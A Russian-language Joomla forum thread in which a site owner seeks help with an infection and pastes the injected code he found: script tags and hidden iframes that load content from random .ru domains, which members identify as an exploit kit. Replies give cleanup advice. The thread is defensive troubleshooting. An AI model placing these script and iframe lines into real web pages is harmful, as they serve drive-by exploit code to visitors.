0 Пользователей и 1 Гость просматривают эту тему.
  • 11 Ответов
  • 2544 Просмотров
*

Dusk09

  • Захожу иногда
  • 100
  • 0 / 0
Здравсвуйте! Перечитал весь форум, перепробовал все сканеры, но они только обнаруживают проблему, перепробовал все методы поиска по куску кода (base64, eval ) погоите. пожалуйста..определить где он живет. как вылечить...скрины http://imgur.com/a/42Om7
Вот что в  Head
<script src="http://13t0h6f0f7s.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>
<script src="http://cbbze5u2m65vg8.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>

и
BODY
<iframe id="a1996667054" src="https://su2lgyoeucscn.ru/f2.html?a=14945" style="display: none;"></iframe>
<iframe id="a754394637" src="https://doiuhrht.ru/u.html?a=14945" style="display: none;"></iframe>
*

ProtectYourSite

  • Живу я здесь
  • 2356
  • 135 / 4
  • Безопасность вебсайтов
Проверять надо всё: может быть и в базе данных ( в модуле или статье какой), может подключаться плагином, шаблоном или каким-то компонентом. Надо проверять все файлы.
Конкретно в вашем случае, эти скрипты уже скорее всего подключаются или генерируются функцией, необходимо её сначала определить, иначе поиск никуда не приведет
*

Gosha5767

  • Захожу иногда
  • 487
  • 27 / 0
Попробуйте методом исключения, т.е. по очереди отключайте компоненты, плагины, модули и проверяйте сканером.
программа Xenu`s Link Sleuth - в помощь
Чистка сайта от дублей в Яндекс и Google.
Миграция Joomla 1.5 до Joomla 3.хх
Доработка сайта
*

Dusk09

  • Захожу иногда
  • 100
  • 0 / 0
Проверять надо всё: может быть и в базе данных ( в модуле или статье какой), может подключаться плагином, шаблоном или каким-то компонентом. Надо проверять все файлы.
Конкретно в вашем случае, эти скрипты уже скорее всего подключаются или генерируются функцией, необходимо её сначала определить, иначе поиск никуда не приведет
искал на локальной копии сайта...
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Здравсвуйте! Перечитал весь форум, перепробовал все сканеры, но они только обнаруживают проблему, перепробовал все методы поиска по куску кода (base64, eval ) погоите. пожалуйста..определить где он живет. как вылечить...скрины http://imgur.com/a/42Om7
Вот что в  Head
<script src="http://13t0h6f0f7s.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>
<script src="http://cbbze5u2m65vg8.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>

и
BODY
<iframe id="a1996667054" src="https://su2lgyoeucscn.ru/f2.html?a=14945" style="display: none;"></iframe>
<iframe id="a754394637" src="https://doiuhrht.ru/u.html?a=14945" style="display: none;"></iframe>
Поздравляю вас! на вашем сайте похоже установили связку сплоитов, по моему мнению, это наверное самое ЗЛО, что может быть в заражение сайтов! а такие люди которые это делают, стараются более качественней подходят к своему ремеслу, там крутятся очень большие бабки, и соответствующие финансы входят в поддержку работоспособности подобного бизнеса, как минимум начните со своего компьютера, а потом переходите на лечение сайта.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Советую создать новый сайт в папке сайта, и проверить на iframe.
А проще не искать вирус/шелл в тяжелых случаях, а пересобрать заново сайт на новой версии Joomla и установленных расширений и подключить потом старую базу данных.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Советую создать новый сайт в папке сайта, и проверить на iframe.
А проще не искать вирус/шелл в тяжелых случаях, а пересобрать заново сайт на новой версии Joomla и установленных расширений и подключить потом старую базу данных.
Суть в том что пересоздание сайта не поможет, тут комп протроянен и сколько бы сайтов ТС не сделал, взломщику будут доступны все его доступы, включая почты, соц. сетей месенеджеров и прочей лабудени...

Пройдитесь по сценарию скрипта увидите что подобная неприятность и вам загрузится если у вас уязвимый браузер... только рекомендую через TOR чтоб на самом деле не подцепить эту херь!
*

Dusk09

  • Захожу иногда
  • 100
  • 0 / 0
Суть в том что пересоздание сайта не поможет, тут комп протроянен и сколько бы сайтов ТС не сделал, взломщику будут доступны все его доступы, включая почты, соц. сетей месенеджеров и прочей лабудени...

Пройдитесь по сценарию скрипта увидите что подобная неприятность и вам загрузится если у вас уязвимый браузер... только рекомендую через TOR чтоб на самом деле не подцепить эту херь!
Не замечал что кто либо использует мои аккуанты... да и эти вирусы только на одном из трех сайтов ..подозреваю все таки плагины .... Мои действия ?? 1.Проверка компа антивирусом.
« Последнее редактирование: 26.12.2016, 16:04:15 от Dusk09 »
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Не замечал что кто либо использует мои аккуанты...подозреваю все таки плагины .... Мои действия ?? 1.Проверка компа антивирусом.
Ну это может пока не использовали.

Действия:
1. Чистите тщательно свой комп.
        проверти браузеры на сторонние расширения, они могут не детектиться АВ.
        обновляйте плагины, Adobe продукцию какая стоит и используется браузерами, сами браузеры, java
2. Меняете все пассы от чего у вас только может быть
3. Переходите к чистке сайта

*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Да не факт что комп ТС. Скрипт я проверил у drweb, есть в базе . (Зачем мне еще на комп грузить, если есть онлайн проверка)
Старый проверенный способ - проверка методом исключения. СОздал Joomla в папке рабочего сайта, нет вируса- значит проблема только в рабочем сайте.
Если есть желание то можно проверить сайты, расположенные на том же хостинге, на наличие вируса. Может сервак хостера взломан, и во все сайты прописывается вирус. У людей на взломанном серваке и в файлы HTML прописывался.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Да не факт что комп ТС. Скрипт я проверил у drweb, есть в базе . (Зачем мне еще на комп грузить, если есть онлайн проверка)
Старый проверенный способ - проверка методом исключения. СОздал Joomla в папке рабочего сайта, нет вируса- значит проблема только в рабочем сайте.
Если есть желание то можно проверить сайты, расположенные на том же хостинге, на наличие вируса. Может сервак хостера взломан, и во все сайты прописывается вирус. У людей на взломанном серваке и в файлы HTML прописывался.
Это ка вариант, но не факт! поэтому в таком случае, все методы хороши.... тем более с таким типом заражения.
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
ТС, вы пробовали проверить домены, с которых вам подключены скрипты? Играми в интернете не увлекаетесь?
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 63255
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 1011
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 3007
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 1806
Последний ответ 22.02.2022, 11:38:15
от AlexP750
Спам, вирус или дело в браузере Google

Автор alekcae

Ответов: 13
Просмотров: 981
Последний ответ 16.05.2021, 18:52:24
от alekcae